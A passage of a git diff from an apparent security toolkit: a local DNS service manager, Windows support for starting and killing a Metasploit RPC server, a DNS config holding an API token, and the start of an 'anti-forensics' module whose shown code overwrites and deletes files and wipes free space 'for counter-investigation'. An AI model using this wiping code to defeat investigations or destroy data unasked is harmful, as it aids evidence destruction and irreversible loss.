||||
}
|
||||
self._save_config()
|
||||
|
||||
def _save_config(self):
|
||||
os.makedirs(os.path.dirname(self._config_path), exist_ok=True)
|
||||
with open(self._config_path, 'w') as f:
|
||||
json.dump(self._config, f, indent=2)
|
||||
|
||||
@property
|
||||
def api_base(self) -> str:
|
||||
addr = self._config.get('listen_api', '127.0.0.1:5380')
|
||||
return f'http://{addr}'
|
||||
|
||||
@property
|
||||
def api_token(self) -> str:
|
||||
return self._config.get('api_token', '')
|
||||
|
||||
def find_binary(self) -> str:
|
||||
"""Find the autarch-dns binary."""
|
||||
binary = find_tool('autarch-dns')
|
||||
if binary:
|
||||
return binary
|
||||
# Check common locations
|
||||
base = Path(__file__).parent.parent
|
||||
candidates = [
|
||||
base / 'services' / 'dns-server' / 'autarch-dns',
|
||||
base / 'services' / 'dns-server' / 'autarch-dns.exe',
|
||||
base / 'tools' / 'windows-x86_64' / 'autarch-dns.exe',
|
||||
base / 'tools' / 'linux-arm64' / 'autarch-dns',
|
||||
base / 'tools' / 'linux-x86_64' / 'autarch-dns',
|
||||
]
|
||||
for c in candidates:
|
||||
if c.exists():
|
||||
return str(c)
|
||||
return None
|
||||
|
||||
def is_running(self) -> bool:
|
||||
"""Check if the DNS service is running."""
|
||||
# Check process
|
||||
if self._process and self._process.poll() is None:
|
||||
return True
|
||||
# Check by API
|
||||
try:
|
||||
resp = self._api_get('/api/status')
|
||||
return resp.get('ok', False)
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
def start(self) -> dict:
|
||||
"""Start the DNS service."""
|
||||
if self.is_running():
|
||||
return {'ok': True, 'message': 'DNS service already running'}
|
||||
|
||||
binary = self.find_binary()
|
||||
if not binary:
|
||||
return {'ok': False, 'error': 'autarch-dns binary not found. Build it with: cd services/dns-server && go build'}
|
||||
|
||||
# Ensure zone dirs exist
|
||||
os.makedirs(self._config.get('zones_dir', ''), exist_ok=True)
|
||||
os.makedirs(self._config.get('dnssec_keys_dir', ''), exist_ok=True)
|
||||
|
||||
# Save config for the Go binary to read
|
||||
self._save_config()
|
||||
|
||||
cmd = [
|
||||
binary,
|
||||
'-config', self._config_path,
|
||||
]
|
||||
|
||||
try:
|
||||
kwargs = {
|
||||
'stdout': subprocess.DEVNULL,
|
||||
'stderr': subprocess.DEVNULL,
|
||||
}
|
||||
if sys.platform == 'win32':
|
||||
kwargs['creationflags'] = (
|
||||
subprocess.CREATE_NEW_PROCESS_GROUP |
|
||||
subprocess.CREATE_NO_WINDOW
|
||||
)
|
||||
else:
|
||||
kwargs['start_new_session'] = True
|
||||
|
||||
self._process = subprocess.Popen(cmd, **kwargs)
|
||||
self._pid = self._process.pid
|
||||
|
||||
# Wait for API to be ready
|
||||
for _ in range(30):
|
||||
time.sleep(0.5)
|
||||
try:
|
||||
resp = self._api_get('/api/status')
|
||||
if resp.get('ok'):
|
||||
return {
|
||||
'ok': True,
|
||||
'message': f'DNS service started (PID {self._pid})',
|
||||
'pid': self._pid,
|
||||
}
|
||||
except Exception:
|
||||
if self._process.poll() is not None:
|
||||
return {'ok': False, 'error': 'DNS service exited immediately — may need admin/root for port 53'}
|
||||
continue
|
||||
|
||||
return {'ok': False, 'error': 'DNS service started but API not responding'}
|
||||
except PermissionError:
|
||||
return {'ok': False, 'error': 'Permission denied — DNS on port 53 requires admin/root'}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
def stop(self) -> dict:
|
||||
"""Stop the DNS service."""
|
||||
if self._process and self._process.poll() is None:
|
||||
try:
|
||||
if sys.platform == 'win32':
|
||||
self._process.terminate()
|
||||
else:
|
||||
os.kill(self._process.pid, signal.SIGTERM)
|
||||
self._process.wait(timeout=5)
|
||||
except Exception:
|
||||
self._process.kill()
|
||||
self._process = None
|
||||
self._pid = None
|
||||
return {'ok': True, 'message': 'DNS service stopped'}
|
||||
return {'ok': True, 'message': 'DNS service was not running'}
|
||||
|
||||
def status(self) -> dict:
|
||||
"""Get service status."""
|
||||
running = self.is_running()
|
||||
result = {
|
||||
'running': running,
|
||||
'pid': self._pid,
|
||||
'listen_dns': self._config.get('listen_dns', ''),
|
||||
'listen_api': self._config.get('listen_api', ''),
|
||||
}
|
||||
if running:
|
||||
try:
|
||||
resp = self._api_get('/api/status')
|
||||
result.update(resp)
|
||||
except Exception:
|
||||
pass
|
||||
return result
|
||||
|
||||
# ── API wrappers ─────────────────────────────────────────────────────
|
||||
|
||||
def _api_get(self, endpoint: str) -> dict:
|
||||
if not _HAS_REQUESTS:
|
||||
return self._api_urllib(endpoint, 'GET')
|
||||
resp = requests.get(
|
||||
f'{self.api_base}{endpoint}',
|
||||
headers={'Authorization': f'Bearer {self.api_token}'},
|
||||
timeout=5,
|
||||
)
|
||||
return resp.json()
|
||||
|
||||
def _api_post(self, endpoint: str, data: dict = None) -> dict:
|
||||
if not _HAS_REQUESTS:
|
||||
return self._api_urllib(endpoint, 'POST', data)
|
||||
resp = requests.post(
|
||||
f'{self.api_base}{endpoint}',
|
||||
headers={'Authorization': f'Bearer {self.api_token}', 'Content-Type': 'application/json'},
|
||||
json=data or {},
|
||||
timeout=5,
|
||||
)
|
||||
return resp.json()
|
||||
|
||||
def _api_delete(self, endpoint: str) -> dict:
|
||||
if not _HAS_REQUESTS:
|
||||
return self._api_urllib(endpoint, 'DELETE')
|
||||
resp = requests.delete(
|
||||
f'{self.api_base}{endpoint}',
|
||||
headers={'Authorization': f'Bearer {self.api_token}'},
|
||||
timeout=5,
|
||||
)
|
||||
return resp.json()
|
||||
|
||||
def _api_put(self, endpoint: str, data: dict = None) -> dict:
|
||||
if not _HAS_REQUESTS:
|
||||
return self._api_urllib(endpoint, 'PUT', data)
|
||||
resp = requests.put(
|
||||
f'{self.api_base}{endpoint}',
|
||||
headers={'Authorization': f'Bearer {self.api_token}', 'Content-Type': 'application/json'},
|
||||
json=data or {},
|
||||
timeout=5,
|
||||
)
|
||||
return resp.json()
|
||||
|
||||
def _api_urllib(self, endpoint: str, method: str, data: dict = None) -> dict:
|
||||
"""Fallback using urllib (no requests dependency)."""
|
||||
import urllib.request
|
||||
url = f'{self.api_base}{endpoint}'
|
||||
body = json.dumps(data).encode() if data else None
|
||||
req = urllib.request.Request(
|
||||
url, data=body, method=method,
|
||||
headers={
|
||||
'Authorization': f'Bearer {self.api_token}',
|
||||
'Content-Type': 'application/json',
|
||||
},
|
||||
)
|
||||
with urllib.request.urlopen(req, timeout=5) as resp:
|
||||
return json.loads(resp.read())
|
||||
|
||||
# ── High-level zone operations ───────────────────────────────────────
|
||||
|
||||
def list_zones(self) -> list:
|
||||
return self._api_get('/api/zones').get('zones', [])
|
||||
|
||||
def create_zone(self, domain: str) -> dict:
|
||||
return self._api_post('/api/zones', {'domain': domain})
|
||||
|
||||
def get_zone(self, domain: str) -> dict:
|
||||
return self._api_get(f'/api/zones/{domain}')
|
||||
|
||||
def delete_zone(self, domain: str) -> dict:
|
||||
return self._api_delete(f'/api/zones/{domain}')
|
||||
|
||||
def list_records(self, domain: str) -> list:
|
||||
return self._api_get(f'/api/zones/{domain}/records').get('records', [])
|
||||
|
||||
def add_record(self, domain: str, rtype: str, name: str, value: str,
|
||||
ttl: int = 300, priority: int = 0) -> dict:
|
||||
return self._api_post(f'/api/zones/{domain}/records', {
|
||||
'type': rtype, 'name': name, 'value': value,
|
||||
'ttl': ttl, 'priority': priority,
|
||||
})
|
||||
|
||||
def delete_record(self, domain: str, record_id: str) -> dict:
|
||||
return self._api_delete(f'/api/zones/{domain}/records/{record_id}')
|
||||
|
||||
def setup_mail_records(self, domain: str, mx_host: str = '',
|
||||
dkim_key: str = '', spf_allow: str = '') -> dict:
|
||||
return self._api_post(f'/api/zones/{domain}/mail-setup', {
|
||||
'mx_host': mx_host, 'dkim_key': dkim_key, 'spf_allow': spf_allow,
|
||||
})
|
||||
|
||||
def enable_dnssec(self, domain: str) -> dict:
|
||||
return self._api_post(f'/api/zones/{domain}/dnssec/enable')
|
||||
|
||||
def disable_dnssec(self, domain: str) -> dict:
|
||||
return self._api_post(f'/api/zones/{domain}/dnssec/disable')
|
||||
|
||||
def get_metrics(self) -> dict:
|
||||
return self._api_get('/api/metrics').get('metrics', {})
|
||||
|
||||
def get_config(self) -> dict:
|
||||
return self._config.copy()
|
||||
|
||||
def update_config(self, updates: dict) -> dict:
|
||||
for k, v in updates.items():
|
||||
if k in self._config:
|
||||
self._config[k] = v
|
||||
self._save_config()
|
||||
# Also update running service
|
||||
try:
|
||||
return self._api_put('/api/config', updates)
|
||||
except Exception:
|
||||
return {'ok': True, 'message': 'Config saved (service not running)'}
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
_lock = threading.Lock()
|
||||
|
||||
|
||||
def get_dns_service() -> DNSServiceManager:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
with _lock:
|
||||
if _instance is None:
|
||||
_instance = DNSServiceManager()
|
||||
return _instance
|
||||
322
core/msf.py
322
core/msf.py
@ -538,38 +538,75 @@ class MSFManager:
|
||||
def _find_msfrpcd_pid(self) -> Optional[str]:
|
||||
"""Find the PID of running msfrpcd process.
|
||||
|
||||
Works on both Linux (pgrep, /proc) and Windows (tasklist, wmic).
|
||||
|
||||
Returns:
|
||||
PID as string, or None if not found
|
||||
"""
|
||||
try:
|
||||
# Use pgrep to find msfrpcd
|
||||
result = subprocess.run(
|
||||
['pgrep', '-f', 'msfrpcd'],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=5
|
||||
)
|
||||
if result.returncode == 0 and result.stdout.strip():
|
||||
# Return first PID found
|
||||
pids = result.stdout.strip().split('\n')
|
||||
return pids[0] if pids else None
|
||||
except (subprocess.TimeoutExpired, FileNotFoundError):
|
||||
pass
|
||||
import sys
|
||||
is_win = sys.platform == 'win32'
|
||||
|
||||
# Fallback: check /proc on Linux
|
||||
try:
|
||||
for pid_dir in os.listdir('/proc'):
|
||||
if pid_dir.isdigit():
|
||||
try:
|
||||
cmdline_path = f'/proc/{pid_dir}/cmdline'
|
||||
with open(cmdline_path, 'r') as f:
|
||||
cmdline = f.read()
|
||||
if 'msfrpcd' in cmdline:
|
||||
return pid_dir
|
||||
except (IOError, PermissionError):
|
||||
continue
|
||||
except Exception:
|
||||
pass
|
||||
if is_win:
|
||||
# Windows: use tasklist to find ruby/msfrpcd processes
|
||||
for search_term in ['msfrpcd', 'thin', 'ruby']:
|
||||
try:
|
||||
result = subprocess.run(
|
||||
['tasklist', '/FI', f'IMAGENAME eq {search_term}*',
|
||||
'/FO', 'CSV', '/NH'],
|
||||
capture_output=True, text=True, timeout=5
|
||||
)
|
||||
if result.returncode == 0:
|
||||
for line in result.stdout.strip().split('\n'):
|
||||
line = line.strip().strip('"')
|
||||
if line and 'INFO:' not in line:
|
||||
parts = line.split('","')
|
||||
if len(parts) >= 2:
|
||||
return parts[1].strip('"')
|
||||
except (subprocess.TimeoutExpired, FileNotFoundError):
|
||||
pass
|
||||
|
||||
# Fallback: wmic for command-line matching
|
||||
try:
|
||||
result = subprocess.run(
|
||||
['wmic', 'process', 'where',
|
||||
"commandline like '%msfrpcd%' or commandline like '%thin%msf%'",
|
||||
'get', 'processid'],
|
||||
capture_output=True, text=True, timeout=5
|
||||
)
|
||||
if result.returncode == 0:
|
||||
for line in result.stdout.strip().split('\n'):
|
||||
line = line.strip()
|
||||
if line.isdigit():
|
||||
return line
|
||||
except (subprocess.TimeoutExpired, FileNotFoundError):
|
||||
pass
|
||||
else:
|
||||
# Linux: use pgrep
|
||||
try:
|
||||
result = subprocess.run(
|
||||
['pgrep', '-f', 'msfrpcd'],
|
||||
capture_output=True, text=True, timeout=5
|
||||
)
|
||||
if result.returncode == 0 and result.stdout.strip():
|
||||
pids = result.stdout.strip().split('\n')
|
||||
return pids[0] if pids else None
|
||||
except (subprocess.TimeoutExpired, FileNotFoundError):
|
||||
pass
|
||||
|
||||
# Fallback: check /proc on Linux
|
||||
try:
|
||||
for pid_dir in os.listdir('/proc'):
|
||||
if pid_dir.isdigit():
|
||||
try:
|
||||
cmdline_path = f'/proc/{pid_dir}/cmdline'
|
||||
with open(cmdline_path, 'r') as f:
|
||||
cmdline = f.read()
|
||||
if 'msfrpcd' in cmdline:
|
||||
return pid_dir
|
||||
except (IOError, PermissionError):
|
||||
continue
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return None
|
||||
|
||||
@ -577,11 +614,15 @@ class MSFManager:
|
||||
"""Kill any running msfrpcd server.
|
||||
|
||||
Args:
|
||||
use_sudo: Use sudo for killing (needed if server was started with sudo)
|
||||
use_sudo: Use sudo for killing (needed if server was started with sudo).
|
||||
Ignored on Windows.
|
||||
|
||||
Returns:
|
||||
True if server was killed or no server was running
|
||||
"""
|
||||
import sys
|
||||
is_win = sys.platform == 'win32'
|
||||
|
||||
is_running, pid = self.detect_server()
|
||||
|
||||
if not is_running:
|
||||
@ -591,77 +632,168 @@ class MSFManager:
|
||||
if self.is_connected:
|
||||
self.disconnect()
|
||||
|
||||
# Kill the process
|
||||
if pid:
|
||||
try:
|
||||
# Try without sudo first
|
||||
os.kill(int(pid), signal.SIGTERM)
|
||||
# Wait a bit for graceful shutdown
|
||||
time.sleep(1)
|
||||
|
||||
# Check if still running, force kill if needed
|
||||
if is_win:
|
||||
# Windows: use taskkill
|
||||
if pid:
|
||||
try:
|
||||
os.kill(int(pid), 0) # Check if process exists
|
||||
os.kill(int(pid), signal.SIGKILL)
|
||||
time.sleep(0.5)
|
||||
except ProcessLookupError:
|
||||
pass # Process already dead
|
||||
subprocess.run(
|
||||
['taskkill', '/F', '/PID', str(pid)],
|
||||
capture_output=True, timeout=10
|
||||
)
|
||||
time.sleep(1)
|
||||
return True
|
||||
except Exception as e:
|
||||
print(f"{Colors.RED}[X] Failed to kill msfrpcd (PID {pid}): {e}{Colors.RESET}")
|
||||
|
||||
return True
|
||||
except PermissionError:
|
||||
# Process owned by root, need sudo
|
||||
if use_sudo:
|
||||
try:
|
||||
subprocess.run(['sudo', 'kill', '-TERM', str(pid)], timeout=5)
|
||||
time.sleep(1)
|
||||
# Check if still running
|
||||
try:
|
||||
os.kill(int(pid), 0)
|
||||
subprocess.run(['sudo', 'kill', '-KILL', str(pid)], timeout=5)
|
||||
except ProcessLookupError:
|
||||
pass
|
||||
return True
|
||||
except Exception as e:
|
||||
print(f"{Colors.RED}[X] Failed to kill msfrpcd with sudo (PID {pid}): {e}{Colors.RESET}")
|
||||
return False
|
||||
else:
|
||||
print(f"{Colors.RED}[X] Failed to kill msfrpcd (PID {pid}): Permission denied{Colors.RESET}")
|
||||
return False
|
||||
except ProcessLookupError:
|
||||
return True # Already dead
|
||||
|
||||
# Try pkill as fallback (with sudo if needed)
|
||||
try:
|
||||
if use_sudo:
|
||||
subprocess.run(['sudo', 'pkill', '-f', 'msfrpcd'], timeout=5)
|
||||
else:
|
||||
subprocess.run(['pkill', '-f', 'msfrpcd'], timeout=5)
|
||||
# Fallback: kill by image name
|
||||
for name in ['msfrpcd', 'ruby', 'thin']:
|
||||
try:
|
||||
subprocess.run(
|
||||
['taskkill', '/F', '/IM', f'{name}.exe'],
|
||||
capture_output=True, timeout=5
|
||||
)
|
||||
except Exception:
|
||||
pass
|
||||
time.sleep(1)
|
||||
return True
|
||||
except Exception:
|
||||
pass
|
||||
else:
|
||||
# Linux: kill by PID or pkill
|
||||
if pid:
|
||||
try:
|
||||
os.kill(int(pid), signal.SIGTERM)
|
||||
time.sleep(1)
|
||||
try:
|
||||
os.kill(int(pid), 0)
|
||||
os.kill(int(pid), signal.SIGKILL)
|
||||
time.sleep(0.5)
|
||||
except ProcessLookupError:
|
||||
pass
|
||||
return True
|
||||
except PermissionError:
|
||||
if use_sudo:
|
||||
try:
|
||||
subprocess.run(['sudo', 'kill', '-TERM', str(pid)], timeout=5)
|
||||
time.sleep(1)
|
||||
try:
|
||||
os.kill(int(pid), 0)
|
||||
subprocess.run(['sudo', 'kill', '-KILL', str(pid)], timeout=5)
|
||||
except ProcessLookupError:
|
||||
pass
|
||||
return True
|
||||
except Exception as e:
|
||||
print(f"{Colors.RED}[X] Failed to kill msfrpcd with sudo (PID {pid}): {e}{Colors.RESET}")
|
||||
return False
|
||||
else:
|
||||
print(f"{Colors.RED}[X] Failed to kill msfrpcd (PID {pid}): Permission denied{Colors.RESET}")
|
||||
return False
|
||||
except ProcessLookupError:
|
||||
return True
|
||||
|
||||
# Try pkill as fallback
|
||||
try:
|
||||
if use_sudo:
|
||||
subprocess.run(['sudo', 'pkill', '-f', 'msfrpcd'], timeout=5)
|
||||
else:
|
||||
subprocess.run(['pkill', '-f', 'msfrpcd'], timeout=5)
|
||||
time.sleep(1)
|
||||
return True
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return False
|
||||
|
||||
def _find_msf_install(self) -> Optional[str]:
|
||||
"""Find the Metasploit Framework installation directory.
|
||||
|
||||
Returns:
|
||||
Path to the MSF install directory, or None if not found.
|
||||
"""
|
||||
import sys
|
||||
is_win = sys.platform == 'win32'
|
||||
|
||||
if is_win:
|
||||
# Common Windows Metasploit install paths
|
||||
candidates = [
|
||||
os.path.join(os.environ.get('ProgramFiles', r'C:\Program Files'), 'Metasploit'),
|
||||
os.path.join(os.environ.get('ProgramFiles(x86)', r'C:\Program Files (x86)'), 'Metasploit'),
|
||||
r'C:\metasploit-framework',
|
||||
os.path.join(os.environ.get('LOCALAPPDATA', ''), 'Metasploit'),
|
||||
os.path.join(os.environ.get('ProgramFiles', ''), 'Rapid7', 'Metasploit'),
|
||||
]
|
||||
for c in candidates:
|
||||
if c and os.path.isdir(c):
|
||||
return c
|
||||
# Also check with -framework suffix
|
||||
cf = c + '-framework' if not c.endswith('-framework') else c
|
||||
if cf and os.path.isdir(cf):
|
||||
return cf
|
||||
else:
|
||||
candidates = [
|
||||
'/opt/metasploit-framework',
|
||||
'/usr/share/metasploit-framework',
|
||||
'/opt/metasploit',
|
||||
os.path.expanduser('~/.msf4'),
|
||||
]
|
||||
for c in candidates:
|
||||
if os.path.isdir(c):
|
||||
return c
|
||||
|
||||
return None
|
||||
|
||||
def start_server(self, username: str, password: str,
|
||||
host: str = "127.0.0.1", port: int = 55553,
|
||||
use_ssl: bool = True, use_sudo: bool = True) -> bool:
|
||||
"""Start the msfrpcd server with given credentials.
|
||||
|
||||
Works on both Linux and Windows.
|
||||
|
||||
Args:
|
||||
username: RPC username
|
||||
password: RPC password
|
||||
host: Host to bind to
|
||||
port: Port to listen on
|
||||
use_ssl: Whether to use SSL
|
||||
use_sudo: Run msfrpcd with sudo (required for raw socket modules like SYN scan)
|
||||
use_sudo: Run msfrpcd with sudo (Linux only; ignored on Windows)
|
||||
|
||||
Returns:
|
||||
True if server started successfully
|
||||
"""
|
||||
# Build msfrpcd command
|
||||
import sys
|
||||
is_win = sys.platform == 'win32'
|
||||
|
||||
# Find msfrpcd binary
|
||||
from core.paths import find_tool
|
||||
msfrpcd_bin = find_tool('msfrpcd') or 'msfrpcd'
|
||||
msfrpcd_bin = find_tool('msfrpcd')
|
||||
|
||||
if not msfrpcd_bin and is_win:
|
||||
# Windows: look for msfrpcd.bat in common locations
|
||||
msf_dir = self._find_msf_install()
|
||||
if msf_dir:
|
||||
for candidate in [
|
||||
os.path.join(msf_dir, 'bin', 'msfrpcd.bat'),
|
||||
os.path.join(msf_dir, 'bin', 'msfrpcd'),
|
||||
os.path.join(msf_dir, 'msfrpcd.bat'),
|
||||
os.path.join(msf_dir, 'embedded', 'bin', 'ruby.exe'),
|
||||
]:
|
||||
if os.path.isfile(candidate):
|
||||
msfrpcd_bin = candidate
|
||||
break
|
||||
|
||||
if not msfrpcd_bin:
|
||||
# Try PATH with .bat extension
|
||||
for ext in ['.bat', '.cmd', '.exe', '']:
|
||||
for p in os.environ.get('PATH', '').split(os.pathsep):
|
||||
candidate = os.path.join(p, f'msfrpcd{ext}')
|
||||
if os.path.isfile(candidate):
|
||||
msfrpcd_bin = candidate
|
||||
break
|
||||
if msfrpcd_bin:
|
||||
break
|
||||
|
||||
if not msfrpcd_bin:
|
||||
msfrpcd_bin = 'msfrpcd' # Last resort: hope it's on PATH
|
||||
|
||||
# Build command
|
||||
cmd = [
|
||||
msfrpcd_bin,
|
||||
'-U', username,
|
||||
@ -674,21 +806,32 @@ class MSFManager:
|
||||
if not use_ssl:
|
||||
cmd.append('-S') # Disable SSL
|
||||
|
||||
# Prepend sudo if requested
|
||||
if use_sudo:
|
||||
# On Windows, if it's a .bat file, run through cmd
|
||||
if is_win and msfrpcd_bin.endswith('.bat'):
|
||||
cmd = ['cmd', '/c'] + cmd
|
||||
|
||||
# Prepend sudo on Linux if requested
|
||||
if not is_win and use_sudo:
|
||||
cmd = ['sudo'] + cmd
|
||||
|
||||
try:
|
||||
# Start msfrpcd in background
|
||||
self._server_process = subprocess.Popen(
|
||||
cmd,
|
||||
stdout=subprocess.DEVNULL,
|
||||
stderr=subprocess.DEVNULL,
|
||||
start_new_session=True # Detach from our process group
|
||||
)
|
||||
popen_kwargs = {
|
||||
'stdout': subprocess.DEVNULL,
|
||||
'stderr': subprocess.DEVNULL,
|
||||
}
|
||||
if is_win:
|
||||
popen_kwargs['creationflags'] = (
|
||||
subprocess.CREATE_NEW_PROCESS_GROUP |
|
||||
subprocess.CREATE_NO_WINDOW
|
||||
)
|
||||
else:
|
||||
popen_kwargs['start_new_session'] = True
|
||||
|
||||
self._server_process = subprocess.Popen(cmd, **popen_kwargs)
|
||||
|
||||
# Wait for server to start (check port becomes available)
|
||||
max_wait = 30 # seconds
|
||||
max_wait = 30
|
||||
start_time = time.time()
|
||||
port_open = False
|
||||
|
||||
@ -712,9 +855,8 @@ class MSFManager:
|
||||
return False
|
||||
|
||||
# Port is open, but server needs time to initialize RPC layer
|
||||
# msfrpcd can take 5-10 seconds to fully initialize on some systems
|
||||
print(f"{Colors.DIM} Waiting for RPC initialization...{Colors.RESET}")
|
||||
time.sleep(5) # Give server time to fully initialize
|
||||
time.sleep(5)
|
||||
|
||||
# Try a test connection to verify server is really ready
|
||||
for attempt in range(10):
|
||||
@ -726,7 +868,7 @@ class MSFManager:
|
||||
test_rpc.connect(password)
|
||||
test_rpc.disconnect()
|
||||
return True
|
||||
except MSFError as e:
|
||||
except MSFError:
|
||||
if attempt < 9:
|
||||
time.sleep(2)
|
||||
continue
|
||||
@ -735,8 +877,6 @@ class MSFManager:
|
||||
time.sleep(2)
|
||||
continue
|
||||
|
||||
# Server started but auth still failing - return true anyway
|
||||
# The server IS running, caller can retry connection
|
||||
print(f"{Colors.YELLOW}[!] Server running but authentication not ready - try connecting manually{Colors.RESET}")
|
||||
return True
|
||||
|
||||
|
||||
10
data/dns/config.json
Normal file
10
data/dns/config.json
Normal file
@ -0,0 +1,10 @@
|
||||
{
|
||||
"listen_dns": "10.0.0.56:53",
|
||||
"listen_api": "127.0.0.1:5380",
|
||||
"api_token": "5ed79350fed2490d2aca6f3b29776365",
|
||||
"upstream": [],
|
||||
"cache_ttl": 300,
|
||||
"zones_dir": "C:\\she\\autarch\\data\\dns\\zones",
|
||||
"dnssec_keys_dir": "C:\\she\\autarch\\data\\dns\\keys",
|
||||
"log_queries": true
|
||||
}
|
||||
53
data/dns/zones/autarch.local.json
Normal file
53
data/dns/zones/autarch.local.json
Normal file
@ -0,0 +1,53 @@
|
||||
{
|
||||
"domain": "autarch.local",
|
||||
"soa": {
|
||||
"primary_ns": "ns1.autarch.local",
|
||||
"admin_email": "admin.autarch.local",
|
||||
"serial": 1772537115,
|
||||
"refresh": 3600,
|
||||
"retry": 600,
|
||||
"expire": 86400,
|
||||
"min_ttl": 300
|
||||
},
|
||||
"records": [
|
||||
{
|
||||
"id": "ns1",
|
||||
"type": "NS",
|
||||
"name": "autarch.local.",
|
||||
"value": "ns1.autarch.local.",
|
||||
"ttl": 3600
|
||||
},
|
||||
{
|
||||
"id": "mx1",
|
||||
"type": "MX",
|
||||
"name": "autarch.local.",
|
||||
"value": "mx.autarch.local.",
|
||||
"ttl": 3600,
|
||||
"priority": 10
|
||||
},
|
||||
{
|
||||
"id": "spf1",
|
||||
"type": "TXT",
|
||||
"name": "autarch.local.",
|
||||
"value": "v=spf1 ip4:127.0.0.1 -all",
|
||||
"ttl": 3600
|
||||
},
|
||||
{
|
||||
"id": "dmarc1",
|
||||
"type": "TXT",
|
||||
"name": "_dmarc.autarch.local.",
|
||||
"value": "v=DMARC1; p=none; rua=mailto:dmarc@autarch.local",
|
||||
"ttl": 3600
|
||||
},
|
||||
{
|
||||
"id": "r1772537722879235900",
|
||||
"type": "A",
|
||||
"name": "https://autarch.local",
|
||||
"value": "10.0.0.56:8181",
|
||||
"ttl": 300
|
||||
}
|
||||
],
|
||||
"dnssec": true,
|
||||
"created_at": "2026-03-03T11:25:07Z",
|
||||
"updated_at": "2026-03-03T12:24:00Z"
|
||||
}
|
||||
2413
devjournal.md
Normal file
2413
devjournal.md
Normal file
File diff suppressed because it is too large
Load Diff
580
modules/anti_forensics.py
Normal file
580
modules/anti_forensics.py
Normal file
@ -0,0 +1,580 @@
|
||||
"""AUTARCH Anti-Forensics
|
||||
|
||||
Secure file deletion, timestamp manipulation, log clearing, metadata scrubbing,
|
||||
and counter-forensics techniques for operational security.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Anti-forensics & counter-investigation tools"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "counter"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import struct
|
||||
import shutil
|
||||
import secrets
|
||||
import subprocess
|
||||
from pathlib import Path
|
||||
from datetime import datetime, timezone
|
||||
from typing import Dict, List, Optional, Any
|
||||
|
||||
try:
|
||||
from core.paths import find_tool, get_data_dir
|
||||
except ImportError:
|
||||
def find_tool(name):
|
||||
return shutil.which(name)
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
try:
|
||||
from PIL import Image as PILImage
|
||||
HAS_PIL = True
|
||||
except ImportError:
|
||||
HAS_PIL = False
|
||||
|
||||
|
||||
# ── Secure Deletion ─────────────────────────────────────────────────────────
|
||||
|
||||
class SecureDelete:
|
||||
"""Secure file/directory deletion with overwrite patterns."""
|
||||
|
||||
PATTERNS = {
|
||||
'zeros': b'\x00',
|
||||
'ones': b'\xFF',
|
||||
'random': None, # Generated per-pass
|
||||
'dod_3pass': [b'\x00', None, b'\xFF'], # DoD 5220.22-M simplified
|
||||
'gutmann': None, # 35 passes with specific patterns
|
||||
}
|
||||
|
||||
@staticmethod
|
||||
def secure_delete_file(filepath: str, passes: int = 3,
|
||||
method: str = 'random') -> Dict:
|
||||
"""Securely delete a file by overwriting before unlinking."""
|
||||
if not os.path.exists(filepath):
|
||||
return {'ok': False, 'error': 'File not found'}
|
||||
|
||||
try:
|
||||
file_size = os.path.getsize(filepath)
|
||||
|
||||
if method == 'dod_3pass':
|
||||
patterns = [b'\x00', None, b'\xFF']
|
||||
else:
|
||||
patterns = [None] * passes # All random
|
||||
|
||||
# Overwrite passes
|
||||
for i, pattern in enumerate(patterns):
|
||||
with open(filepath, 'r+b') as f:
|
||||
remaining = file_size
|
||||
while remaining > 0:
|
||||
chunk_size = min(4096, remaining)
|
||||
if pattern is None:
|
||||
chunk = secrets.token_bytes(chunk_size)
|
||||
else:
|
||||
chunk = pattern * chunk_size
|
||||
f.write(chunk[:chunk_size])
|
||||
remaining -= chunk_size
|
||||
f.flush()
|
||||
os.fsync(f.fileno())
|
||||
|
||||
# Truncate to zero
|
||||
with open(filepath, 'w') as f:
|
||||
pass
|
||||
|
||||
# Rename to random name before deletion (anti-filename recovery)
|
||||
directory = os.path.dirname(filepath)
|
||||
random_name = os.path.join(directory, secrets.token_hex(16))
|
||||
os.rename(filepath, random_name)
|
||||
os.unlink(random_name)
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'file': filepath,
|
||||
'size': file_size,
|
||||
'passes': len(patterns),
|
||||
'method': method,
|
||||
'message': f'Securely deleted {filepath} ({file_size} bytes, {len(patterns)} passes)'
|
||||
}
|
||||
|
||||
except PermissionError:
|
||||
return {'ok': False, 'error': 'Permission denied'}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
@staticmethod
|
||||
def secure_delete_directory(dirpath: str, passes: int = 3) -> Dict:
|
||||
"""Recursively securely delete all files in a directory."""
|
||||
if not os.path.isdir(dirpath):
|
||||
return {'ok': False, 'error': 'Directory not found'}
|
||||
|
||||
deleted = 0
|
||||
errors = 0
|
||||
|
||||
for root, dirs, files in os.walk(dirpath, topdown=False):
|
||||
for name in files:
|
||||
filepath = os.path.join(root, name)
|
||||
result = SecureDelete.secure_delete_file(filepath, passes)
|
||||
if result['ok']:
|
||||
deleted += 1
|
||||
else:
|
||||
errors += 1
|
||||
|
||||
for name in dirs:
|
||||
try:
|
||||
os.rmdir(os.path.join(root, name))
|
||||
except OSError:
|
||||
errors += 1
|
||||
|
||||
try:
|
||||
os.rmdir(dirpath)
|
||||
except OSError:
|
||||
errors += 1
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'directory': dirpath,
|
||||
'files_deleted': deleted,
|
||||
'errors': errors
|
||||
}
|
||||
|
||||
@staticmethod
|
||||
def wipe_free_space(mount_point: str, passes: int = 1) -> Dict:
|
||||
"""Fill free space with random data then delete (anti-carving)."""
|
||||
try:
|
||||
temp_file = os.path.join(mount_point, f'.wipe_{secrets.token_hex(8)}')
|
||||
chunk_size = 1024 * 1024 # 1MB
|
||||
written = 0
|
||||
|
||||
with open(temp_file, 'wb') as f:
|
||||
try:
|
||||
while True:
|
||||
